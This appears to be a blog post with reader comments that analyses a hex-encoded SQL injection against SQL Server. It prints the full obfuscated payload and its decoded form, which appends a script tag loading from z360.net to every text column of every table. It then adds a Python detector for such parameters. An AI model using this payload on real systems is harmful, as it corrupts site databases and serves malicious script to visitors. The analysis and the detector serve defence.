zhuyx808

Hex-encoded SQL injection


The payload is injected through POST, GET or cookie parameters; the injected content is as follows:

```sql
DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065006300 6C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C00650028004000400046006500740063006800 5F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500 6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;
```



The SQL statement as converted in Query Analyzer is as follows:


```sql
Declare @T Varchar(255),@C Varchar(255)
-- Enumerate every (table, column) pair of user tables ('u') whose column is text-like:
-- xtype 99=ntext, 35=text, 231=nvarchar, 167=varchar
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
    -- Appends a <script> tag to every row of every text-like column found above
    Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')
    Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
```
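The conversion step above can be reproduced outside Query Analyzer. The following Python script is added here as an example and is not part of the original post: it decodes a 0x... literal the way CAST(... AS NVARCHAR) does (UTF-16LE, the same thing the commenter's `print @S` reveals) and flags request parameters that carry the DECLARE/CAST/EXEC wrapper. The regex names, `inspect_parameter` and the constructed sample parameter are my own.

```python
import re

# Wrapper pattern from the post: CaSt(0x<hex> aS NvArChAR(4000)) ... ExEc(@S)
# Group 1 = hex digits, group 2 = "n" when the target type is NVARCHAR.
HEX_CAST_RE = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?)varchar\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
EXEC_VAR_RE = re.compile(r"exec\s*\(\s*@\w+\s*\)", re.IGNORECASE)
DML_RE = re.compile(r"\b(update|insert|delete|drop|exec|select)\b", re.IGNORECASE)


def decode_hex_literal(hex_digits: str, nvarchar: bool = True) -> str:
    """Decode a 0x... literal as CAST(... AS NVARCHAR) / CAST(... AS VARCHAR) would.

    NVARCHAR is UTF-16LE, so every character takes two bytes (0x4400 -> 'D'),
    which is why the payload in the post reads as "D.e.c.l..." in a hex dump.
    """
    if len(hex_digits) % 2:  # SQL Server left-pads odd-length binary literals
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    return raw.decode("utf-16-le" if nvarchar else "latin-1", errors="replace")


def inspect_parameter(value: str) -> dict:
    """Reveal the statement hidden in one request parameter (the 'print @S' step)."""
    m = HEX_CAST_RE.search(value)
    if not m:
        return {"encoded": False, "decoded": "", "suspicious": False}
    decoded = decode_hex_literal(m.group(1), nvarchar=bool(m.group(2)))
    # Hex alone is not proof; require the EXEC(@var) sink plus a DML keyword inside.
    suspicious = EXEC_VAR_RE.search(value) is not None and DML_RE.search(decoded) is not None
    return {"encoded": True, "decoded": decoded, "suspicious": suspicious}


# Constructed sample: a short statement wrapped exactly like the post's payload.
SAMPLE_SQL = "update [t] set [c]=1"
SAMPLE_HEX = "0x" + SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_PARAM = (
    "1;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(" + SAMPLE_HEX
    + " aS NvArChAR(4000));ExEc(@S);--"
)

if __name__ == "__main__":
    for param in ("id=42", SAMPLE_PARAM):
        print(inspect_parameter(param))
```

Running the same check over web-server access logs (URL-decoded first) finds past attempts, since the hex digits survive in the query string even when the keywords are mixed-case.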

Comments
#2 zhuyx808 2011-02-10
Actually, the block of code above is itself a SQL statement. To get around restrictions on plaintext keywords (select, update, delete) they converted the code to hexadecimal, and exec can execute that statement. You just need to add print @s before the exec to see the statement.
#1 iwlk 2011-01-08
How exactly is it "converted in Query Analyzer"? I couldn't find it~ Hope you can give me a pointer or two~
